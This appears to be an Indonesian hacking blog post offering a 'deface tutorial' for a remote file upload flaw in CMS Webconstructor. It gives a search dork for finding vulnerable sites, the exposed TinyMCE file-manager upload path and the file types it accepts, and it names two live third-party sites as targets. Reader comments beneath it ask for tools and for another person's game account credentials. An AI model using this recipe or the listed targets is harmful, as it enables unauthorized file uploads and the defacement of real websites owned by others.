Home / Vuln / CMS Webconstructor Remote File Upload
hacked-by-badboy

CMS Webconstructor Remote File Upload

Assalamualaikum sahabat Binus Hacker 🙂 Ketemu sama saya lagi nih hhehe, pagi ini saya mau share tutorial deface yang ajib lagi, yaitu “CMS Webconstructor Remote File Upload Vulnerability” semoga bermanfaat ya karena saya yakin tutorial saya bermanfaat semua nya hhaha. Ok simak berikut ini.

===============================================
Exploit Title: CMS Webconstructor Remote File Upload Vulnerability
Dork: intext:CMS: webconstructor.pl
Author: BadBoy
Category: Remote, Webapps
Tested on: Windows Xp SP3

===============================================

-> Exploit <-
http://[localhost]/PATH/tiny_mce/plugins/filemanager/InsertFile/insert_file.php

-> Allowed File <-
You can upload ,html ,pdf ,ppt ,txt ,doc ,jpg, etc except php, php4, asp

-> Preview <-
– You can see if you success upload file.

-> Live Target <-
– http://mexico-extreme.com/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
– http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php

===============================================

Sudah cukup begitu, saya rasa kalian sudah mengerti bagaimana cara eksekusi nya hehe, kalau yang bingung? Komen aja di bawah, InsyaAllah saya feedback dengan cepat 😉

Semoga bermanfaat aja ya, Wassalamualaikum

About BadBoy

Saya baik dengan semua orang, asalkan orang itu baik juga kepada saya :) hehe. Big Fans: Manchester City dan Inter Milan

Check Also

php-s3-appo

PHP S3 Appro [Japanese Sites] Vulnerability

Assalamualaikum sahabat B|H, Baik aja ya semoga, karena hari ini saya mau posting seputar proof …

6 comments

  1. ini cms apa aja ya klo boleh tau?

  2. salam hangat ,

    bang Admin boleh minta cara lengkap nya?+ toolsnya .. soalnya masih awam baru belajar ..
    di tunggu komen nya,

    Best Regards,

  3. bagaimana untok melihat file yg kita upload

  4. Hahaha Fikri sama BadBoy sama aj 😀

  5. om minta pb pangkat bintang 1emas id dan passnya

  6. shashaparamuda

    Sound systemku kurang keras

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *